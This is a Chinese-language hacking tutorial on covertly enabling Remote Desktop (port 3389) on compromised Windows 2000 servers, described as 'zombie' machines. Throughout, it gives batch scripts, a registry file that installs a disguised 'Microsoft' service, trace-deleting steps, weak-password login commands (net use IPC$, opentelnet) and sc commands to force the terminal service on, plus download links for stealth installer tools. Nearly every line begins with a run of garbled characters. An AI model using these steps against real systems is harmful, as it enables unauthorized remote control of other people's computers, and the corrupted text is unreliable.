[hide=60] 1.打开记事本,编辑内容如下:
n>�,�:*5"G echo [Components] > c:\sql
}9"�''��Z echo TSEnable = on >> c:\sql
)&1v�[]�%S sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
^H.�B6�h?� 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
Fa�>�f'VXx #4bT8k���q 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
u4~+Bc_G�L 地址:
www.netsill.com/rots.zip \.mV�L�LtG 使用方法:
OK80-/8HI 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
"++\6�H�<� �1@L18�%�h c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
n/5T{�NfG� ,<%uG6/",g 服务端口: 设置终端服务的服务端口。默认是3389。
EN2t}rua� 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
4�C�3_��gm 使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。
Nj4CkM�M[3 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
]oV��{JR]� 运行CMD(2000下的DOS),我们给它开终端!
�
b �M1�\z 命令如下!
���|iH�MAo cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
g& � e� u� 上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启)
EU[eG^�/0@ d�B_0B���. 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
y{@\��8B�] 因为pro版不能安装终端服务。
�^y��PZ$Q� 如果你确信脚本判断错误,就继续安装好了。
?2&= �+QaT t�s,r��,{ 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
*�/�M`KP�W �B%6cg��m, 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
Kz42�A�C�� F
`o9GLxM} 1GK�.:s6.f 3,下载3389自动安装程序-djshao正式版5.0
�/X_�L�>or 地址
www.netsill.com/djshao.zip #Q!X�z�2z2 说明:
m:h6J''<Z* 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\ winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
o+Jn�n"�8� A��ZQQge� 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持非法内容,请删除韩繁四个版本的win2000服务器版!
n�v_v��FK� a�|z-EKV�� v](�Y n)�# 4.下载DameWare NT Utilities 3.66.0.0 注册版
�e�I��$�V2 地址
www.netsill.com/dwmrcw36600.zip <��9,�h��! 安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
MG vz-�E1e 复制启动后出现对方桌面。
s9+)�:,dKP 在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。
cK1^�j�H<| $~6MR_Yq� 6��HK1?��� 5.
<{�cY2cx~3 �6
^3RfF^W 首先我们制作开启3389的工具
o`�c+eMwr( 先把下面的注册表内容copy一份,另存为3389.reg注册表文件
~�Tt�@�v`} 注册表内容:
� C^"zU>W_ Windows Registry Editor Version 5.00
;�<g�a�rDf [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
�?� #rXc%F "Enabled"="0"
E��to"B"� [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
<ZSX�O�h,' "ShutdownWithoutLogon"="0"
_+B�y�=B.' [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
�HMF�2sc$N "EnableAdminTSRemote"=dword:00000001
\eKXsO�"�d [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
1�.+O2qB�� "TSEnabled"=dword:00000001
}%Mdf6LS64 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
M�
v��(Pp� "Start"=dword:00000002
�� n��z�?[ [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
xJ$u�oy3�+ "Hotkey"="1"
zTcz+��3x� [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
%8n<#0v-|4 "Start"=dword:00000002
u*�@R`,Y
� "ErrorControl"=dword:00000001
! :]_��-DX "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
#$B��FTlm| 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
}eV�D�e(7_ 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
7�2Bc�0Wg
"ObjectName"="LocalSystem"
u��9�@�B�& "Type"=dword:00000010
�{*O�%A�
"Description"="Microsoft"
�0FcDO5�ia "DisplayName"="Microsoft"
-]0���:FKW 再把下面的内容保存为批处理文件3389.bat
��CBd%}il� 安装批处理内容:
&t�Z�IWV1& copy termsrv.exe eventlog.exe
�v<v;Z�R�) regedit.exe /s 3389.reg
�}3:� m��n del 3389.reg
W$`v^�1M2o del 3389.exe
`e,�}7zGR� del 3389.bat
����m
.(ja 用winrar制作成exe自解压缩包
dnLjcHFj�& �Xq$�-&~
� 61.188.***.*** user:administrato pass:空
w���3(G!�: 先使用工具letmein判断其操作系统
�^rJTlh
9 letmein \\ip -all -d
�&��pzL}/u TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
)L��9eL�xI 再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
clU ?bF~e1 应该没有开启了
h�h�PQ.{]> 建立ipc连接
�e^eJ!~��0 copy工具过去
t}R!i-D|HB net use \\ip\ipc$ "pass" /user:name
8j�>V?'Szk copy file \\ip\admin$\system32
q.���=�Q� 用opentelnet开对方的telnet
H7�+z"^�s* opentelnet \\ip name pass 1 99
"~ID.G|�< 用telnet进入
SOR��\oZ7 进入到对方的winnt\system32\
nq�H�[
�y0 目录
[UX�VL}t�k 解压缩3389.exe
2�B�$dT=�G 运行安装批处理3389.bat
bWA_�a]�G 现在我们把对方重起一下,用reboot
T@ESMPeU:X k4$z�M/ob �q+9�^r�Q� �x��,^�-a ZOfv\(iJ;� 7.
fC'u-m?!Q' sX6\AY�F1M 检查对方是否真的禁用了Terminal server
�y<6Sl6�l* C:\>sc \\xxx.xxx.xxx.xxx qc termservice
���^4`x:6m [SC] GetServiceConfig SUCCESS
p�'LLzc�## SERVICE_NAME: termservice
$E�Y[CA
E TYPE : 10 WIN32_OWN_PROCESS
X��i"9y� @ START_TYPE : 4 DISABLED
&qWg$_��Yh ERROR_CONTROL : 1 NORMAL
cV>�?*9�z0 BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
,5zY1C==Ut LOAD_ORDER_GROUP :
1L�::Qu%E� TAG : 0
�:.AC%'��S DISPLAY_NAME : Terminal Services
3�����Y#�� DEPENDENCIES :
c<_1�o!6�8 SERVICE_START_NAME : LocalSystem
CfW#W�k:8J 仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。
_�XZK�2�Q[ q}Po)IUT`5 =*�'yGB[x) C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
;cf�$u}+ [SC] ChangeServiceConfig SUCCESS
�SHYek��X 好了,现在我们已经把对方终端服务的启动模式修改成自动了。
g"n>�v�
c7 T�Fb7P��/g ]7�<$1ta�� �B)7�:�*Kj 再检查一便对方终端服务的启动模式
Qs��wPga(- C:\>sc \\TEST qc termservice
��je$H��}D [SC] GetServiceConfig SUCCESS
�~Zsj��@�d SERVICE_NAME: termservice
#8t��=vb3� TYPE : 10 WIN32_OWN_PROCESS
XwEM�F�5�[ START_TYPE : 2 AUTO_START
h�u���b]M ERROR_CONTROL : 1 NORMAL
@XG1d�)sE� BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
eH��Uy�V@ LOAD_ORDER_GROUP :
kq=Htbv�7� TAG : 0
mH;t�)dT� DISPLAY_NAME : Terminal Services
N_��:!��uR DEPENDENCIES :
Lf�x �a^�0 SERVICE_START_NAME : LocalSystem
e6'0g=Y# � W=
NX$=il� EUt2�S_�2P
�z}J~X%}e 启动对方的终端服务
�!��Yo�2P" C:\>sc \\xxx.xxx.xxx.xxx start termservice
_K?v�^o�M# SERVICE_NAME: termservice
-ioO��8D&! TYPE : 10 WIN32_OWN_PROCESS
J�Uw|nUnl? STATE : 2 START_PENDING
0��*]�0#2Z (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
�p�rO&"t
> WIN32_EXIT_CODE : 0 (0x0)
)Mq4p�'*A[ SERVICE_EXIT_CODE : 0 (0x0)
�L�T{�g^g CHECKPOINT : 0x1
Ke^/a�Gi}O WAIT_HINT : 0x7530
�'2l[~T$�* �@}UOm-��M �O(�ev�lci C:\>sc \\xxx.xxx.xxx.xxx query termservice
N@0/�=B[�n SERVICE_NAME: termservice
�v�89tV9O) TYPE : 10 WIN32_OWN_PROCESS
'`}D�+IQ(j STATE : 4 RUNNING
�sifjmN�P (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
&56\@��t�^ WIN32_EXIT_CODE : 0 (0x0)
fR;�[?�?NH SERVICE_EXIT_CODE : 0 (0x0)
��:H�i�tx CHECKPOINT : 0x0
x�s6��!NY� WAIT_HINT : 0x0[/hide]
